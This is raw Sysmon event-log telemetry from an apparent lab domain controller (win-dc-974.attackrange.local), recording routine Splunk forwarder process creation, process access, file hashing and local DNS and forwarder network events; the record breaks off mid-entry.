16:56:55.405{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:55.405{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:55.405{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6E57-603E-08AB-00000000AD01}10624C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:55.405{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E57-603E-08AB-00000000AD01}10624C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:55.406{05ADC7E1-6E57-603E-08AB-00000000AD01}10624C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002245237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:55.155{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91EBB037AE7F8C5350AC88255ACAF6FA,SHA256=23C138A5A3A29C6E2B1DEBE40E75B0A2B1D3373825CF32571819B9EBC8BE5863,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:55.108{05ADC7E1-6E56-603E-07AB-00000000AD01}1459211260C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:56.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD8648F2BCA0ACA7DB8B61911BC656EB,SHA256=91604ECEE6EFB7AA30BA7B882F5CB7183994C6331140691D353EA82448F9D8C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:56.177{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7324EE4439696E811D91617E1A8236C1,SHA256=9DD840ED9CBFB64AAA58D0584F7CB274D4A983CED2E23D11D1838BC6146AEC80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:57.880{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EF0DADD1A2124B21FFEEEB1A46BBB43,SHA256=5C6CFE07E0E8E8E4C5496C4AB41D0512AF36F07D23856B13DDB729FD41D9A91C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:57.202{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B0D803D56326348467D8EC518DB1AE2,SHA256=8693B8B2823FDB2C782B0FB69DD71415B937EE2E9801E3ABAAC15EC06410A00F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:47.002{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local50514- 23542300x80000000000000002245254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:58.233{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0C6A13B8296C6E5B41D5CA3E1BDEE88,SHA256=77A8D2B6310E644BE9697D90121637DD7D1C4AE73B8A281D9AAE31971A2395E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002245253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:48.017{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local50514- 354300x80000000000000002245252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:47.346{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60205-false10.0.1.12-8000- 23542300x80000000000000002245255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:59.264{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5D407007A2DDF1A85C2BC930F4D0772,SHA256=5A9311118D7D64A206BFDCE6AC6CF5D672F1B0A76F7AF5BD97D06CA7FE1C2B96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:00.936{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=054F8D1321D79DA2DEFB44E8E5714F7F,SHA256=2D546255BB4EEF3E5B994D70B53CBE3059332B8162AA3A23E7BBEE0A0050BB98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:00.282{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE8CC82CEB6B66F634C82339AC052D28,SHA256=3EB25750F04EF8732C64D97114F948F36552A94A2988C271BA30675F11EB8D66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:01.295{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC8F3D36128665A37A983FDA29ABF08F,SHA256=CA1EDE580D581E970BBC6E16D3034F1D39F0801F778246DCB331480DDE660C2C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:02.985{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E5E-603E-09AB-00000000AD01}14272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:02.985{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:02.985{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:02.985{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:02.985{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:02.985{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6E5E-603E-09AB-00000000AD01}14272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:02.985{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E5E-603E-09AB-00000000AD01}14272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:02.984{05ADC7E1-6E5E-603E-09AB-00000000AD01}14272C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002245260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:02.327{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10D1D15551D2D4522EAE99194A9CAE5B,SHA256=4B4691A689B770247B8CE64A9D613CC9D0D08D5C972E7750DDC75B28C90CCF8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:02.295{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=93B4E5C85827C623532E03AB40D15C9F,SHA256=71C5F0FAC7C992C0831B287C44C4AA21F982C59A657ECCE8E834A63DA495EA5D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:03.827{05ADC7E1-6E5F-603E-0AAB-00000000AD01}1195215344C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:03.623{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E5F-603E-0AAB-00000000AD01}11952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:03.623{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:03.623{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:03.623{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:03.623{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:57:03.623{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6E5F-603E-0AAB-00000000AD01}11952C:\Program 